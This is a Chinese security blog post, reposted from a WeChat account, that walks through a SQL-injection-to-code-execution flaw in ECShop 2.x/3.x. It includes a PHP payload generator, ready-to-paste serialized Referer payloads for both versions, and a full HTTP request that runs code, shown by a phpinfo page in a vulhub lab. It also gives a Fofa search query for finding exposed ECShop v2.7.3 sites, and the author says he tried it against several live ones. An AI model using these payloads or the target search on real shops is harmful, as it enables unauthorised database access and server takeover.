ecshop 2.x/3.x sql注入/任意代码执行漏洞

admin 2022年7月31日01:05:12安全文章评论30 views2359字阅读7分51秒阅读模式

前言:

该漏洞影响ECShop 2.x3.x版本,是一个典型的二次漏洞,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代码执行。

值得一提的是攻击者利用的payload只适用于ECShop 2.x版本导致有部分安全分析者认为该漏洞不影响ECShop 3.x,这个是因为在3.x的版本里有引入防注入攻击的安全代码,通过我们分析发现该防御代码完全可以绕过实现对ECShop 3.x的攻击。

Fofa语法:

body="ECSHOP v2.7.3"

ecshop 2.x/3.x sql注入/任意代码执行漏洞

Fofa可以搜到的也不少,但是这个版本大多被修复,我尝试了几个无果之后就放弃了。


环境搭建:

基于vulhub靶场搭建,启动目录:

vulhub-master/ecshop/xianzhi-2017-02-82239600/

启动命令:

docker-compose up -d

启动后访问

你的ip:8080

即可

根据指示安装一下即可

ecshop 2.x/3.x sql注入/任意代码执行漏洞

下面的全是绿色就下一步

ecshop 2.x/3.x sql注入/任意代码执行漏洞

这里数据库主机如下图,用户名和密码都是root,其余随便写

ecshop 2.x/3.x sql注入/任意代码执行漏洞


正文:

根据漏洞文档说的,下面的代码可以生成两个poc

<?php$shell = bin2hex("{$asd'];phpinfot();//}xxx");$id = "-1' UNION/*";$arr = ["num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),"id" => $id];
$s = serialize($arr);
$hash3 = '45ea207d7a2b68c49582d2d22adf953a';$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';
echo "POC for ECShop 2.x: n";echo "{$hash2}ads|{$s}{$hash2}";echo "nnPOC for ECShop 3.x: n";echo "{$hash3}ads|{$s}{$hash3}";?>

需要用phpstudy打开后自动生成,我懒得搭建,就找了网上生成好的直接复制使用

一个是2.x的:

Referer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

一个是3.x的:

Referer:45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

拿到这两个poc之后,我们访问搭建的用户登录界面,打开burp,刷新登录页面,然后发送到重发器,插入poc到Referer位置


GET /user.php HTTP/1.1Host: 192.168.43.111:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94caCookie:PHPSESSID=99b122d847272471b5f276f13b50f4ec; ECS_ID=5ae93da21179d5ab2c98dcc4979e163169fbe55b; ECS[visit_times]=2; ECS[display]=grid; ECSCP_ID=8c4d85f5cf208b861f6f085853dbbacb3603b6f4Upgrade-Insecure-Requests: 1

点击send发送

ecshop 2.x/3.x sql注入/任意代码执行漏洞

我们看到代码执行后,出现了phpinfo页面,证明注入成功了。3.x实现方式同上。


交流群:70844080

公众号:白安全组

作者:【白】


原文始发于微信公众号(白安全组):ecshop 2.x/3.x sql注入/任意代码执行漏洞

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月31日01:05:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  ecshop 2.x/3.x sql注入/任意代码执行漏洞 http://cn-sec.com/archives/1211813.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: